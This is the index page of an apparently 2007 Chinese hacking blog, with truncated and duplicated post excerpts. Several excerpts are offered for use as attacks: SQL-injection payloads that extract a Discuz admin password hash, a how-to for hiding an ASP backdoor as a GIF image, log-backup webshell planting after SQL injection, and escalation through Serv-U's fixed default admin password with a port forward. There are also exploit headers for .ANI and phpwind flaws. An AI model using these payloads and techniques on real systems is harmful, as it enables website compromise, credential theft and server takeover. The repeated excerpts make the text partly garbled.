看看下面的文章你就知道什么叫真正的牛X
[ 2007年4月30日 ]
Tags:
1、
很久以前,那还是我用win98的时候有次我系统崩溃了,因为我是电脑白痴,我朋友给我介绍了一个高手来帮我修电脑。
他看了一下电脑,问我有没有98的盘,我说没有。
很久以前,那还是我用win98的时候有次我系统崩溃了,因为我是电脑白痴,我朋友给我介绍了一个高手来帮我修电脑。
他看了一下电脑,问我有没有98的盘,我说没有。
阅读全文 | 分类:心情随笔 | 评论:2 | 引用:0 | 浏览:
DZ5 0day以及出15位密码的解决方法
[ 2007年4月24日 ]
Tags:
可乐`s Blog
0) union select left(password,15),2,0 from cdb_members where uid=1/*
这句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
这句得到MD5 16-30位
0) union select left(password,15),2,0 from cdb_members where uid=1/*
这句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
这句得到MD5 16-30位
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
图片ASP木马
[ 2007年4月19日 ]
Tags:
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。
asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp后门还是我众马中的首选,现在我们就把它作成图片asp木马。
首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:
asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp后门还是我众马中的首选,现在我们就把它作成图片asp木马。
首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
LOG备份与备份差异的对比
[ 2007年4月19日 ]
Tags: 小技巧
LOG备份
当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.
但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也
好让我们对不能闭合的方法有一个全面的了解.
当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.
但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也
好让我们对不能闭合的方法有一个全面的了解.
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
Webshell与Serv-u结合获系统最高权限
[ 2007年4月9日 ]
Tags:
Serv-U默认监听127.0.0.1:43958,在本机才能连接这个管理端口,Serv-U默认管理账号是localAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"Serv-U administrator"新建SERVER。
目标IP:12345
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
Windows Explorer Unspecified .ANI File Exploit
[ 2007年4月9日 ]
Tags: Exploit
/****************************************************************************
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu *
****************************************************************************/
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu
****************************************************************************/
阅读全文 | 分类:矩阵毒刺 | 评论:0 | 引用:0 | 浏览:
关于IP-MAC地址绑定的交换机设置
[ 2007年4月7日 ]
Tags:
1.方案1——基于端口的MAC地址绑定
思科2950交换机为例,登录进入交换机,输入管理口令进入配置模式,敲入命令:
Switch#config terminal
思科2950交换机为例,登录进入交换机,输入管理口令进入配置模式,敲入命令:
Switch#config terminal
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
Vista又曝漏洞 谷歌拼音输入法成导火索
[ 2007年4月7日 ]
Tags:
Vista用户系统登陆密码形同虚设?4月6日下午,据金山毒霸反病毒专家透漏,微软Vista操作系统输入法接口存在本地登录权限提升漏洞。VISTA用户,如果输入法默认状态设置为谷歌拼音或极点中文输入法,VISTA系统登录密码将形同虚设,电脑可轻易被他人操控。
金山毒霸反病毒工程师李铁军表示,如果将谷歌拼音或极点中文输入法安装到Vista上,并设置为缺省状态,将重现当年Windows2000输入法漏洞,恶意用户可以利用该漏洞在没有获得本机用户许可的情况下,入侵用户电脑。
据了解,之前Windows 2000输入法曝出漏洞,在默认安装的情况下,Windows 2000中的简体中文输入法不能正确地检测当前的状态,导致在系统登录界面中提供了不应有的功能。进而,一些别有用心的用户可以通过直接操作该计算机的键盘得到当前系统权限,运行他选择的代码、更改系统配置、新建用户、添加或删除系统服务、添加、更改或删除数据,或执行其他操作。
金山毒霸反病毒工程师李铁军表示,如果将谷歌拼音或极点中文输入法安装到Vista上,并设置为缺省状态,将重现当年Windows2000输入法漏洞,恶意用户可以利用该漏洞在没有获得本机用户许可的情况下,入侵用户电脑。
据了解,之前Windows 2000输入法曝出漏洞,在默认安装的情况下,Windows 2000中的简体中文输入法不能正确地检测当前的状态,导致在系统登录界面中提供了不应有的功能。进而,一些别有用心的用户可以通过直接操作该计算机的键盘得到当前系统权限,运行他选择的代码、更改系统配置、新建用户、添加或删除系统服务、添加、更改或删除数据,或执行其他操作。
阅读全文 | 分类:业界资讯 | 评论:0 | 引用:0 | 浏览:
phpwind5.0 Exp 0day
[ 2007年4月6日 ]
+------------------------------------------------------------------+
Exploit For Phpwind 5.X Version
BY Loveshell
Just For Fun :)
+------------------------------------------------------------------+
Exploit For Phpwind 5.X Version
BY Loveshell
Just For Fun :)
+------------------------------------------------------------------+
阅读全文 | 分类:矩阵毒刺 | 评论:0 | 引用:0 | 浏览:
|